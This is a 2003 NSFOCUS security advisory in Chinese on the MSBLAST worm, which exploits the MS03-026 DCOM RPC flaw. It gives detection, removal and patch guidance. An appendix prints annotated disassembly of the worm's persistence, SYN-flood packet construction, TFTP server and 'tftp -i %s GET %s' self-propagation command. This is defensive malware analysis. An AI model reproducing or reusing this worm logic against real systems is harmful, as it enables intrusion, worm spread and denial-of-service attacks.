首页 -> 安全研究

安全研究

紧急通告
绿盟科技紧急通告(Alert2003-02)

NSFOCUS安全小组(security@nsfocus.com)
http://www.nsfocus.com

MSBLAST蠕虫紧急公告!

发布日期:2003-08-12

CVE ID:CAN-2003-0352
BUGTRAQ ID:8205

受影响的软件及系统:
====================
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 2003

综述:
======
绿盟科技安全小组的HoneyPot监测到一种针对MS03-026 Microsoft Windows DCOM RPC接口远程缓冲区溢出漏洞的蠕虫正在活跃,危害极大。

更新记录:

2003-08-12  11:00  文档创建
2003-08-14  11:00  修订了解决方案,增加了蠕虫代码分析

分析:
======
北京时间2003年08月12日,绿盟科技安全小组的HoneyPot监测到了一种新的攻击,绿盟科技安全小组火速对捕获的数据样本分析和研究,已经明确,这是一个针对MS03-026 Microsoft Windows DCOM RPC接口远程缓冲区溢出漏洞(http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=5147)的蠕虫。因为该漏洞影响所有没有安装MS03-026补丁的Windows 2000、Windows XP、Windows 2003系统,不仅是服务器,也包括个人计算机在内,所以危害极大。

该蠕虫大小为6176字节。用LCC-Win32 v1.03编译,upx 1.22压缩,创建时间是2003年8月11日7点21分(时区未明)。

蠕虫感染系统后首先检测是否有名为"BILLY"的互斥体存在,如果检测到该互斥体,蠕虫就会退出,如果没有,就创建一个。

然后蠕虫会在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加以下键值:

"windows auto update"="msblast.exe"

以保证每次用户登录的时候蠕虫都会自动运行。

蠕虫还会在本地的UDP/69端口上建立一个tftp服务器,用来向其他受侵害的系统上传送蠕虫的二进制程序msblast.exe。

蠕虫选择目标IP地址的时候会首先选择受感染系统所在子网的IP,然后再按照一定算法随机在互连网上选择目标攻击。

一旦连接建立,蠕虫会向目标的TCP/135端口发送攻击数据。如果攻击成功,会监听目标系统的TCP/4444端口作为后门,并绑定cmd.exe。然后蠕虫会连接到这个端口,发送tftp命令,回连到发起进攻的主机,将msblast.exe传到目标系统上,然后运行它。
蠕虫所带的攻击代码来自一个公开发布的攻击代码,当攻击失败时,可能造成没有打补丁的Windows系统RpcSS服务崩溃。默认情况下,RpcSS服务崩溃会导致Windows XP系统自动重启。该蠕虫不能成功侵入Windows 2003,但是可以造成Windows 2003系统的RpcSS服务崩溃,和Windows XP一样,RpcSS服务崩溃将使系统重启。

蠕虫检测到当前系统月份是8月之后或者日期是15日之后,就会向微软的更新站点“windowsupdate.com”的80端口发动synflood拒绝服务攻击。也就是说,从2003年8月16日开始就会一直进行拒绝服务攻击。

蠕虫代码中还包含以下文本数据:

I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!

关于此蠕虫更详细地代码分析请参考附录部分。

解决方法:
==========
在蠕虫爆发的情况下,凡是连在互连网上的系统都会不断受到攻击数据包的影响。每台机器都会受到针对Windows 2000和Windows XP的攻击数据,而在攻击包和本身的操作系统不一致的情况下,就会使RpcSS服务崩溃。默认情况下,Windows 2000不能正常使用Windows update功能,访问一些网页也会有问题,而Windows XP和Windows 2003会不断重启动。所以应该先采取一些措施暂时阻挡蠕虫的攻击。我们建议您这样做:

1、先断开网络连接,例如拔掉网线或者电话线,然后重新启动系统。

2、保持网络连接是断开的。点击左下角的“开始”菜单,选择“运行”,在其中键入“dcomcnfg”,点击“确定”,这样就打开了DCOM配置工具。(可能会出现几个弹出窗口的提示,可以一律点击确定。)

3、在“默认属性”页,取消“在这台计算机上启用分布式COM”的复选框。然后点击“确定”。

4、这样我们就禁用了DCOM,您的系统不再受蠕虫的影响,您可以连上网络继续下面的安装补丁等操作。如果您的主机是服务器,在安装完补丁之后,最好再启用DCOM,因为我们不知道您系统上是否有某些应用依赖于DCOM。对于个人用户,禁用DCOM在大多数情况下不会有太大影响。

* 检测是否被蠕虫感染:

   1、检查系统的%systemroot%\system32目录下是否存在msblast.exe文件。请在命令提示符中按照下面键入:
      C:\>dir %systemroot%\system32\msblast.exe
      如果被感染,那么您可以看到类似的显示结果:
      C:\>dir %systemroot%\system32\msblast.exe
       驱动器 C 中的卷是 sys
       卷的序列号是 A401-04A9

       C:\WINNT\system32 的目录

      2003-08-12  03:03                6,176 msblast.exe
                     1 个文件          6,176 字节
                     0 个目录  2,701,848,576 可用字节

   2、检查注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run。请在命令提示符中按照下面键入:
      C:\>regedit /e tmp.txt HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      C:\>type tmp.txt
      如果被感染,那么您可以看到类似的显示结果:
      C:\>type tmp.txt
      Windows Registry Editor Version 5.00

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
      "windows auto update"="msblast.exe"

   3、在任务管理器中查看是否有msblast.exe的进程。如果有,说明蠕虫正在您的系统上运行。

   4、目前出现了几个新的变种,只是修改文件名为:penis32.exe、teekids.exe,在注册表中的键值也相应变化。虽然目前影响范围还不大,也需要引起注意。

* 清除蠕虫

   如果发现系统已经被蠕虫感染,我们建议您按照以下步骤手工清除蠕虫:

   1、按照上述方法禁用DCOM。
   2、点击左下角的“开始”菜单,选择“运行”,在其中键入“taskmgr”,点击“确定”。这样就启动了任务管理器。在其中查找msblast.exe进程,找到后在进程上单击右键,选择“结束进程”,点击“是”。
   3、删除系统目录下的msblast.exe。
   4、点击左下角的“开始”菜单,选择“运行”,在其中键入“regedit”,点击“确定”。这样就启动注册表编辑器。在注册表中找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,删除其下的"windows auto update"="msblast.exe"。
   5、重新启动系统。

   截至目前为止,一些杀毒软件厂商的病毒特征库已包含该蠕虫的特征,可以清除该蠕虫,请更新您杀毒软件的病毒特征库进行查杀。

* 预防蠕虫感染:

   为了彻底消除蠕虫的威胁,您必须安装微软在安全公告MS03-026(http://www.microsoft.com/technet/security/bulletin/MS03-026.asp)中提供的安全补丁。

   下载地址:

   Windows NT 4.0 Server:

   http://microsoft.com/downloads/details.aspx?FamilyId=2CC66F4E-217E-4FA7-BDBF-DF77A0B9303F&displaylang=en
   简体中文版补丁:
   http://download.microsoft.com/download/1/a/f/1af70395-d328-4135-86aa-cae9bb4bdec6/CHSQ823980i.EXE

   Windows NT 4.0 Terminal Server Edition :

   http://microsoft.com/downloads/details.aspx?FamilyId=6C0F0160-64FA-424C-A3C1-C9FAD2DC65CA&displaylang=en

   Windows 2000:

   http://microsoft.com/downloads/details.aspx?FamilyId=C8B8A846-F541-4C15-8C9F-220354449117&displaylang=en
   简体中文版补丁:
   http://download.microsoft.com/download/2/8/1/281c0df6-772b-42b0-9125-6858b759e977/Windows2000-KB823980-x86-CHS.exe

   Windows XP 32 bit Edition:

   http://microsoft.com/downloads/details.aspx?FamilyId=2354406C-C5B6-44AC-9532-3DE40F69C074&displaylang=en
   简体中文版补丁:
   http://download.microsoft.com/download/a/a/5/aa56d061-3a38-44af-8d48-85e42de9d2c0/WindowsXP-KB823980-x86-CHS.exe

   Windows XP 64 bit Edition:

   http://microsoft.com/downloads/details.aspx?FamilyId=1B00F5DF-4A85-488F-80E3-C347ADCC4DF1&displaylang=en

   Windows Server 2003 32 bit Edition:

   http://microsoft.com/downloads/details.aspx?FamilyId=F8E0FF3A-9F4C-4061-9009-3A212458E92E&displaylang=en
   简体中文版补丁:
   http://download.microsoft.com/download/0/7/9/07971669-76fc-4e69-bc4e-88837d8005d1/WindowsServer2003-KB823980-x86-CHS.exe

   Windows Server 2003 64 bit Edition:

   http://microsoft.com/downloads/details.aspx?FamilyId=2B566973-C3F0-4EC1-995F-017E35692BC7&displaylang=en

   安装补丁后您需要重新启动系统才能使补丁生效,如有可能,请在下载完补丁后断开网络连接再安装补丁。

   注意: 对于Windows 2000用户,安装这个补丁需要您的系统至少已经安装了SP2,如果您还没有安装Windows SP2,我们建议您安装Windows SP4,因为它还修复了很多其它的严重安全漏洞。

   下载地址是:

   http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/download.asp

   简体中文版SP4(129M)下载地址为:

   http://download.microsoft.com/download/4/1/4/4140e2e0-0ad9-4438-ac52-da0e0429c0e6/w2ksp4_cn.exe


绿盟科技产品的冰之眼IDS(http://www.nsfocus.com/homepage/products/nids.htm)早在该漏洞发布时(2003年7月)就已经可以检测此种攻击;RSAS(http://www.nsfocus.com/homepage/products/rsas.htm)也早就可以检测到网络内受该漏洞影响的主机;对于大量的TCP数据流导致的拒绝服务,黑洞(http://www.nsfocus.com/homepage/products/collapsar.htm)是目前最佳解决方案之一。

附加信息:
==========
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=5147
http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

MSBLAST蠕虫主要代码分析
------------------------
作者: yuyang@nsfocus.com (http://www.nsfocus.com)

;在注册表中写入自启动项
:00401250 55                      push ebp
:00401251 89E5                    mov ebp, esp
:00401253 81ECAC030000            sub esp, 000003AC
:00401259 56                      push esi
:0040125A 57                      push edi
:0040125B 31F6                    xor esi, esi
:0040125D 6A00                    push 00000000
:0040125F 8D45F8                  lea eax, dword ptr [ebp-08]
:00401262 50                      push eax
:00401263 6A00                    push 00000000
:00401265 683F000F00              push 000F003F
:0040126A 6A00                    push 00000000
:0040126C 6A00                    push 00000000
:0040126E 6A00                    push 00000000
:00401270 685D484000              push 0040485D        ;db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
:00401275 6802000080              push 80000002
:0040127A E80D110000              Call 0040238C        ;ADVAPI32.RegCreateKeyExA
:0040127F 6A32                    push 00000032
:00401281 683C404000              push 0040403C        ;db 'msblast.exe',0
:00401286 6A01                    push 00000001
:00401288 6A00                    push 00000000
:0040128A 6849484000              push 00404849        ;db 'windows auto update',0
:0040128F FF75F8                  push [ebp-08]
:00401292 E801110000              Call 00402398        ;ADVAPI32.RegSetValueExA
:00401297 FF75F8                  push [ebp-08]
:0040129A E8E1100000              Call 00402380        ;ADVAPI32.RegCloseKey
;创建互斥体
:0040129F 6843484000              push 00404843        ;db 'BILLY',0
:004012A4 6A01                    push 00000001
:004012A6 6A00                    push 00000000
:004012A8 E8A3100000              Call 00402350        ;KERNEL32.CreateMutexA
……………………
;选择发送数据的随机数
:00401476 E8BD0E0000              Call 00402338        ;KERNEL32.GetTickCount
:0040147B 50                      push eax        ;用GetTickCount的输出作为srand的随机数种子
:0040147C E8B30F0000              Call 00402434        ;CRTDLL.srand
:00401481 59                      pop ecx
:00401482 E8890F0000              Call 00402410        ;CRTDLL.rand
:00401487 B914000000              mov ecx, 00000014
:0040148C 99                      cdq
:0040148D F7F9                    idiv ecx        ;
:0040148F 83FA0C                  cmp edx, 0000000C
:00401492 7D02                    jge 00401496
:00401494 31F6                    xor esi, esi
:00401496 C7053431400001000000    mov dword ptr [00403134], 00000001
:004014A0 E86B0F0000              Call 00402410        ;CRTDLL.rand
:004014A5 B90A000000              mov ecx, 0000000A
:004014AA 99                      cdq
:004014AB F7F9                    idiv ecx
:004014AD 83FA07                  cmp edx, 00000007
:004014B0 7E0A                    jle 004014BC
:004014B2 C7053431400002000000    mov dword ptr [00403134], 00000002
……………………
:00401954 833D3431400001          cmp dword ptr [00403134], 00000001      ;通过比较这个地址来确定发送针对2000还是XP的攻击代码
:0040195B 750C                    jne 00401969
:0040195D C785ECEAFFFF9D130001    mov dword ptr [ebp+FFFFEAEC], 0100139D  ;使用针对Windows XP的跳转地址
:00401967 EB0A                    jmp 00401973
:00401969 C785ECEAFFFF9F751800    mov dword ptr [ebp+FFFFEAEC], 0018759F  ;使用针对Windows 2000的跳转地址
……………………
;判断日期
:004014FC 6A03                    push 00000003        ;size of buffer
:004014FE 8D45F4                  lea eax, dword ptr [ebp-0C]
:00401501 50                      push eax        ;buffer
:00401502 683C484000              push 0040483C        ;db 'd',0    取日期
:00401507 6A00                    push 00000000
:00401509 6A00                    push 00000000
:0040150B 6809040000              push 00000409        ;"0409"="en-us;英语 (美国)"
;从GetDateFormatA的Locale参数来看,作者使用的操作系统的区域设置是美国。
:00401510 E8E70D0000              Call 004022FC        ;KERNEL32.GetDateFormatA
:00401515 6A03                    push 00000003
:00401517 8D45F0                  lea eax, dword ptr [ebp-10]
:0040151A 50                      push eax
:0040151B 683A484000              push 0040483A        ;db 'M',0    取月份
:00401520 6A00                    push 00000000
:00401522 6A00                    push 00000000
:00401524 6809040000              push 00000409
:00401529 E8CE0D0000              Call 004022FC        ;KERNEL32.GetDateFormatA
:0040152E 8D45F4                  lea eax, dword ptr [ebp-0C]
:00401531 50                      push eax
:00401532 E8790E0000              Call 004023B0        ;CRTDLL.atoi
:00401537 59                      pop ecx
:00401538 83F80F                  cmp eax, 0000000F    ;比较日期是否大于15日
:0040153B 7F0F                    jg 0040154C        ;日期大于15日则跳到创建DoS线程
:0040153D 8D7DF0                  lea edi, dword ptr [ebp-10]
:00401540 57                      push edi
:00401541 E86A0E0000              Call 004023B0        ;CRTDLL.atoi
:00401546 59                      pop ecx
:00401547 83F808                  cmp eax, 00000008    ;比较月份是否大于8月
:0040154A 7E16                    jle 00401562        ;月份大于8月则往下执行创建DoS线程
:0040154C 8D45FC                  lea eax, dword ptr [ebp-04]
:0040154F 50                      push eax
:00401550 6A00                    push 00000000
:00401552 6A00                    push 00000000
:00401554 68C11E4000              push 00401EC1        ;DoS子函数
:00401559 6A00                    push 00000000
:0040155B 6A00                    push 00000000
:0040155D E8120E0000              Call 00402374        ;KERNEL32.CreateThread
……………………
;处理地址子函数,转换结果保存在eax
:00401E8B 55                      push ebp
:00401E8C 89E5                    mov ebp, esp
:00401E8E 56                      push esi
:00401E8F 57                      push edi
:00401E90 FF7508                  push [ebp+08]
:00401E93 E8D8020000              Call 00402170        ;WS2_32.inet_addr
:00401E98 89C7                    mov edi, eax
:00401E9A 31F6                    xor esi, esi
:00401E9C 83FFFF                  cmp edi, FFFFFFFF
:00401E9F 751A                    jne 00401EBB        ;如果是IP地址就直接跳过去,如果不是就先解析域名
:00401EA1 FF7508                  push [ebp+08]
:00401EA4 E827030000              Call 004021D0        ;WS2_32.gethostbyname
:00401EA9 89C6                    mov esi, eax
:00401EAB 09F6                    or esi, esi
:00401EAD 7505                    jne 00401EB4
:00401EAF 83C8FF                  or eax, FFFFFFFF
:00401EB2 EB09                    jmp 00401EBD
:00401EB4 8B460C                  mov eax, dword ptr [esi+0C]
:00401EB7 8B00                    mov eax, dword ptr [eax]
:00401EB9 8B38                    mov edi, dword ptr [eax]
:00401EBB 89F8                    mov eax, edi
:00401EBD 5F                      pop edi
:00401EBE 5E                      pop esi
:00401EBF 5D                      pop ebp
:00401EC0 C3                      ret

;DoS子函数
:00401EC1 55                      push ebp
:00401EC2 89E5                    mov ebp, esp
:00401EC4 51                      push ecx
:00401EC5 53                      push ebx
:00401EC6 56                      push esi
:00401EC7 57                      push edi
:00401EC8 C745FC01000000          mov [ebp-04], 00000001
:00401ECF 68EC474000              push 004047EC        ;db 'windowsupdate.com',0
:00401ED4 E8B2FFFFFF              call 00401E8B        ;处理地址子函数
:00401ED9 59                      pop ecx
:00401EDA 89C6                    mov esi, eax        ;esi保存解析出来的IP
:00401EDC 6A01                    push 00000001
:00401EDE 6A00                    push 00000000
:00401EE0 6A00                    push 00000000
:00401EE2 68FF000000              push 000000FF
:00401EE7 6A03                    push 00000003
:00401EE9 6A02                    push 00000002
:00401EEB E84C030000              Call 0040223C        ;WS2_32.WSASocketA
:00401EF0 89C7                    mov edi, eax
:00401EF2 83F8FF                  cmp eax, FFFFFFFF
:00401EF5 7504                    jne 00401EFB
:00401EF7 31C0                    xor eax, eax
:00401EF9 EB34                    jmp 00401F2F
:00401EFB 6A04                    push 00000004
:00401EFD 8D45FC                  lea eax, dword ptr [ebp-04]
:00401F00 50                      push eax
:00401F01 6A02                    push 00000002
:00401F03 6A00                    push 00000000
:00401F05 57                      push edi
:00401F06 E8AD020000              Call 004021B8        ;WS2_32.setsockopt
:00401F0B 83F8FF                  cmp eax, FFFFFFFF
:00401F0E 7504                    jne 00401F14        ;成功则跳转
:00401F10 31C0                    xor eax, eax
:00401F12 EB1B                    jmp 00401F2F
:00401F14 57                      push edi
:00401F15 56                      push esi
:00401F16 E81B000000              call 00401F36        ;SYN Flood发包函数
:00401F1B 83C408                  add esp, 00000008
:00401F1E 6A14                    push 00000014
:00401F20 E837040000              Call 0040235C        ;KERNEL32.Sleep
:00401F25 EBED                    jmp 00401F14
:00401F27 57                      push edi
:00401F28 E8C7020000              Call 004021F4        ;WS2_32.closesocket
:00401F2D 31C0                    xor eax, eax
:00401F2F 5F                      pop edi
:00401F30 5E                      pop esi
:00401F31 5B                      pop ebx
:00401F32 C9                      leave
:00401F33 C20400                  ret 0004

;SYN Flood发包函数
:00401F36 55                      push ebp
:00401F37 89E5                    mov ebp, esp
:00401F39 81EC9C000000            sub esp, 0000009C
:00401F3F 53                      push ebx
:00401F40 56                      push esi
:00401F41 57                      push edi
:00401F42 8D7D9C                  lea edi, dword ptr [ebp-64]
:00401F45 8D35B0474000            lea esi, dword ptr [004047B0]
:00401F4B B90F000000              mov ecx, 0000000F
:00401F50 F3                      repz
:00401F51 A5                      movsd
:00401F52 66C7857EFFFFFF5000      mov word ptr [ebp+FFFFFF7E], 0050
:00401F5B E8D8030000              Call 00402338        ;KERNEL32.GetTickCount
:00401F60 50                      push eax        ;GetTickCount的结果作为srand的随机数种子
:00401F61 E8CE040000              Call 00402434        ;CRTDLL.srand
:00401F66 E8A5040000              Call 00402410        ;CRTDLL.rand
:00401F6B 898568FFFFFF            mov dword ptr [ebp+FFFFFF68], eax
:00401F71 E89A040000              Call 00402410        ;CRTDLL.rand
:00401F76 B9FF000000              mov ecx, 000000FF
:00401F7B 99                      cdq
:00401F7C F7F9                    idiv ecx
:00401F7E 52                      push edx            ;rand
:00401F7F 8BBD68FFFFFF            mov edi, dword ptr [ebp+FFFFFF68]
:00401F85 89F8                    mov eax, edi
:00401F87 B9FF000000              mov ecx, 000000FF
:00401F8C 99                      cdq
:00401F8D F7F9                    idiv ecx
:00401F8F 52                      push edx            ;rand
:00401F90 FF3538314000            push dword ptr [00403138]    ;这两个地址保存的是本机IP的前两字节
:00401F96 FF3514304000            push dword ptr [00403014]
;synflood的源IP不是完全随机的,前两个字节是真实的,后两字节随机。
;这可能是考虑到某些网络设备不允许非本网络的IP向外连接
:00401F9C 682B484000              push 0040482B        ;db '%i.%i.%i.%i',0
:00401FA1 8DBD6EFFFFFF            lea edi, dword ptr [ebp+FFFFFF6E]
:00401FA7 57                      push edi        ;生成的IP
:00401FA8 E87B040000              Call 00402428        ;CRTDLL.sprintf
:00401FAD 8D856EFFFFFF            lea eax, dword ptr [ebp+FFFFFF6E]
:00401FB3 50                      push eax
:00401FB4 E8D2FEFFFF              call 00401E8B        ;处理地址子函数
:00401FB9 89C3                    mov ebx, eax        ;把转换后的IP保存到ebx
;下面开始构造synflood数据包
:00401FBB 66C745800200            mov [ebp-80], 0002
:00401FC1 0FB7857EFFFFFF          movzx eax, word ptr [ebp+FFFFFF7E]
:00401FC8 50                      push eax
        ;目标端口80
:00401FC9 E88A010000              Call 00402158        ;WS2_32.htons
:00401FCE 89C7                    mov edi, eax
:00401FD0 66897D82                mov word ptr [ebp-7E], di
:00401FD4 8B4508                  mov eax, dword ptr [ebp+08]
:00401FD7 894584                  mov dword ptr [ebp-7C], eax
:00401FDA C645EC45                mov [ebp-14], 45
:00401FDE 6A28                    push 00000028
:00401FE0 E873010000              Call 00402158        ;WS2_32.htons
:00401FE5 89C7                    mov edi, eax
:00401FE7 66897DEE                mov word ptr [ebp-12], di
:00401FEB 66C745F00100            mov [ebp-10], 0001    ;ident
:00401FF1 66C745F20000            mov [ebp-0E], 0000    ;Fragment Offset:0
:00401FF7 C645F480                mov [ebp-0C], 80    ;TTL:128
:00401FFB C645F506                mov [ebp-0B], 06    ;Protocol:TCP
:00401FFF 66C745F60000            mov [ebp-0A], 0000
:00402005 8B4508                  mov eax, dword ptr [ebp+08]
:00402008 8945FC                  mov dword ptr [ebp-04], eax
:0040200B 0FB7857EFFFFFF          movzx eax, word ptr [ebp+FFFFFF7E]
:00402012 50                      push eax
:00402013 E840010000              Call 00402158        ;WS2_32.htons
:00402018 89C7                    mov edi, eax
:0040201A 66897DDA                mov word ptr [ebp-26], di
:0040201E 8365E000                and dword ptr [ebp-20], 00000000
:00402022 C645E450                mov [ebp-1C], 50
:00402026 C645E502                mov [ebp-1B], 02
:0040202A 6800400000              push 00004000        ;TCP Window:16384
:0040202F E824010000              Call 00402158        ;WS2_32.htons
:00402034 89C7                    mov edi, eax
:00402036 66897DE6                mov word ptr [ebp-1A], di    ;[ebp-1A]TCP Window:16384
:0040203A 66C745EA0000            mov [ebp-16], 0000
:00402040 66C745E80000            mov [ebp-18], 0000
:00402046 8B45FC                  mov eax, dword ptr [ebp-04]
:00402049 894594                  mov dword ptr [ebp-6C], eax    ;[ebp-6C]目标IP
:0040204C C6459800                mov [ebp-68], 00
:00402050 C6459906                mov [ebp-67], 06
:00402054 6A14                    push 00000014
:00402056 E8FD000000              Call 00402158        ;WS2_32.htons
:0040205B 89C7                    mov edi, eax
:0040205D 66897D9A                mov word ptr [ebp-66], di
:00402061 895DF8                  mov dword ptr [ebp-08], ebx
:00402064 E8A7030000              Call 00402410        ;CRTDLL.rand
:00402069 B9E8030000              mov ecx, 000003E8
:0040206E 99                      cdq
:0040206F F7F9                    idiv ecx
:00402071 89D7                    mov edi, edx
:00402073 81C7E8030000            add edi, 000003E8
:00402079 81E7FFFF0000            and edi, 0000FFFF
:0040207F 57                      push edi        ;随机生成的源端口
:00402080 E8D3000000              Call 00402158        ;WS2_32.htons
:00402085 89C7                    mov edi, eax
:00402087 66897DD8                mov word ptr [ebp-28], di
:0040208B E880030000              Call 00402410        ;CRTDLL.rand
:00402090 898564FFFFFF            mov dword ptr [ebp+FFFFFF64], eax
:00402096 E875030000              Call 00402410        ;CRTDLL.rand    ;随机生成seq number
:0040209B 8BBD64FFFFFF            mov edi, dword ptr [ebp+FFFFFF64]
:004020A1 C1E710                  shl edi, 10
:004020A4 09C7                    or edi, eax
:004020A6 81E7FFFF0000            and edi, 0000FFFF
:004020AC 57                      push edi
:004020AD E8A6000000              Call 00402158        ;WS2_32.htons
:004020B2 89C7                    mov edi, eax
:004020B4 81E7FFFF0000            and edi, 0000FFFF
:004020BA 897DDC                  mov dword ptr [ebp-24], edi
:004020BD 895D90                  mov dword ptr [ebp-70], ebx
:004020C0 6A0C                    push 0000000C
:004020C2 8D4590                  lea eax, dword ptr [ebp-70]
:004020C5 50                      push eax
:004020C6 8D459C                  lea eax, dword ptr [ebp-64]
:004020C9 50                      push eax
:004020CA E81D030000              Call 004023EC        ;CRTDLL.memcpy
:004020CF 6A14                    push 00000014
:004020D1 8D45D8                  lea eax, dword ptr [ebp-28]
:004020D4 50                      push eax
:004020D5 8D45A8                  lea eax, dword ptr [ebp-58]
:004020D8 50                      push eax
:004020D9 E80E030000              Call 004023EC        ;CRTDLL.memcpy
:004020DE 6A20                    push 00000020
:004020E0 8D459C                  lea eax, dword ptr [ebp-64]
:004020E3 50                      push eax
:004020E4 E857FDFFFF              call 00401E40
:004020E9 89C7                    mov edi, eax
:004020EB 66897DE8                mov word ptr [ebp-18], di
:004020EF 6A14                    push 00000014
:004020F1 8D45EC                  lea eax, dword ptr [ebp-14]
:004020F4 50                      push eax
:004020F5 8D459C                  lea eax, dword ptr [ebp-64]
:004020F8 50                      push eax
:004020F9 E8EE020000              Call 004023EC        ;CRTDLL.memcpy
:004020FE 6A14                    push 00000014
:00402100 8D45D8                  lea eax, dword ptr [ebp-28]
:00402103 50                      push eax
:00402104 8D45B0                  lea eax, dword ptr [ebp-50]    ;[ebp-50]源端口
:00402107 50                      push eax
:00402108 E8DF020000              Call 004023EC        ;CRTDLL.memcpy
:0040210D 6A04                    push 00000004
:0040210F 6A00                    push 00000000
:00402111 8D45C4                  lea eax, dword ptr [ebp-3C]
:00402114 50                      push eax
:00402115 E8DE020000              Call 004023F8        ;CRTDLL.memset
:0040211A 6A28                    push 00000028
:0040211C 8D459C                  lea eax, dword ptr [ebp-64]
:0040211F 50                      push eax
:00402120 E81BFDFFFF              call 00401E40
:00402125 89C7                    mov edi, eax
:00402127 66897DF6                mov word ptr [ebp-0A], di
:0040212B 6A14                    push 00000014
:0040212D 8D45EC                  lea eax, dword ptr [ebp-14]
:00402130 50                      push eax
:00402131 8D459C                  lea eax, dword ptr [ebp-64]
:00402134 50                      push eax
:00402135 E8B2020000              Call 004023EC        ;CRTDLL.memcpy
:0040213A 83C478                  add esp, 00000078
:0040213D 6A10                    push 00000010
:0040213F 8D4580                  lea eax, dword ptr [ebp-80]
:00402142 50                      push eax
:00402143 6A00                    push 00000000
:00402145 6A28                    push 00000028
:00402147 8D459C                  lea eax, dword ptr [ebp-64]
:0040214A 50                      push eax
:0040214B FF750C                  push [ebp+0C]
:0040214E E859000000              Call 004021AC        ;WS2_32.sendto    发包
:00402153 5F                      pop edi
:00402154 5E                      pop esi
:00402155 5B                      pop ebx
:00402156 C9                      leave
:00402157 C3                      ret

………………

;创建tftp服务器函数
:00401576 55                      push ebp
:00401577 89E5                    mov ebp, esp
:00401579 81EC2C040000            sub esp, 0000042C
:0040157F 53                      push ebx
:00401580 56                      push esi
:00401581 57                      push edi
:00401582 C7053840400001000000    mov dword ptr [00404038], 00000001
:0040158C 6A00                    push 00000000
:0040158E 6A02                    push 00000002        ;SOCK_DGRAM    使用UDP
:00401590 6A02                    push 00000002
:00401592 E82D0C0000              Call 004021C4        ;WS2_32.socket
:00401597 A324314000              mov dword ptr [00403124], eax
:0040159C 83F8FF                  cmp eax, FFFFFFFF
:0040159F 0F8445010000            je 004016EA
:004015A5 6A10                    push 00000010
:004015A7 6A00                    push 00000000
:004015A9 8D85D8FDFFFF            lea eax, dword ptr [ebp+FFFFFDD8]
:004015AF 50                      push eax
:004015B0 E8430E0000              Call 004023F8        ;CRTDLL.memset
:004015B5 83C40C                  add esp, 0000000C
:004015B8 66C785D8FDFFFF0200      mov word ptr [ebp+FFFFFDD8], 0002
:004015C1 6A45                    push 00000045        ;监听69端口
:004015C3 E8900B0000              Call 00402158        ;WS2_32.htons
:004015C8 89C2                    mov edx, eax
:004015CA 668995DAFDFFFF          mov word ptr [ebp+FFFFFDDA], dx
:004015D1 83A5DCFDFFFF00          and dword ptr [ebp+FFFFFDDC], 00000000
:004015D8 6A10                    push 00000010
:004015DA 8D85D8FDFFFF            lea eax, dword ptr [ebp+FFFFFDD8]
:004015E0 50                      push eax
:004015E1 FF3524314000            push dword ptr [00403124]
:004015E7 E8F00B0000              Call 004021DC        ;WS2_32.bind
:004015EC 09C0                    or eax, eax
:004015EE 0F85F6000000            jne 004016EA
:004015F4 C785F8FDFFFF10000000    mov dword ptr [ebp+FFFFFDF8], 00000010
:004015FE 8D85F8FDFFFF            lea eax, dword ptr [ebp+FFFFFDF8]
:00401604 50                      push eax
:00401605 8D85E8FDFFFF            lea eax, dword ptr [ebp+FFFFFDE8]
:0040160B 50                      push eax
:0040160C 6A00                    push 00000000
:0040160E 6804020000              push 00000204
:00401613 8D85D4FBFFFF            lea eax, dword ptr [ebp+FFFFFBD4]
:00401619 50                      push eax
:0040161A FF3524314000            push dword ptr [00403124]
:00401620 E8630B0000              Call 00402188        ;WS2_32.recvfrom
:00401625 83F801                  cmp eax, 00000001    ;如果请求
:00401628 0F8CBC000000            jl 004016EA
:0040162E 31DB                    xor ebx, ebx
:00401630 6837484000              push 00404837        ;db 'rb',0    只读、bin模式打开文件
:00401635 6820304000              push 00403020        ;当前文件绝对路径的偏移
:0040163A E8950D0000              Call 004023D4        ;CRTDLL.fopen
;这个蠕虫建立tftp的方式和当年的Nimda是一样的,不管请求的文件名是什么,都返回蠕虫文件。
;所以这个tftp服务器是不会导致系统文件泄露的。和Nimda不同的是,只有成功地攻击了一台机器之后,这个tftp服务器才会运行。
;所以在感染了msblast.exe的系统上没看到监听UDP/69端口是很正常的。

………………

;创建tftp服务器线程,发送tftp命令传送文件及运行
:00401CBD 8D85CCE6FFFF            lea eax, dword ptr [ebp+FFFFE6CC]
:00401CC3 50                      push eax
:00401CC4 6A00                    push 00000000
:00401CC6 6A00                    push 00000000
:00401CC8 6876154000              push 00401576        ;创建tftp服务器函数
:00401CCD 6A00                    push 00000000
:00401CCF 6A00                    push 00000000
:00401CD1 E89E060000              Call 00402374        ;KERNEL32.CreateThread
:00401CD6 8985C0EDFFFF            mov dword ptr [ebp+FFFFEDC0], eax
:00401CDC 6A50                    push 00000050
:00401CDE E879060000              Call 0040235C        ;KERNEL32.Sleep
:00401CE3 683C404000              push 0040403C        ;db 'msblast.exe',0
:00401CE8 6800304000              push 00403000        ;本机IP
:00401CED 680C484000              push 0040480C        ;db 'tftp -i %s GET %s',0
:00401CF2 8D85FCEDFFFF            lea eax, dwor

声 明
==========

本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。

关于绿盟科技
============

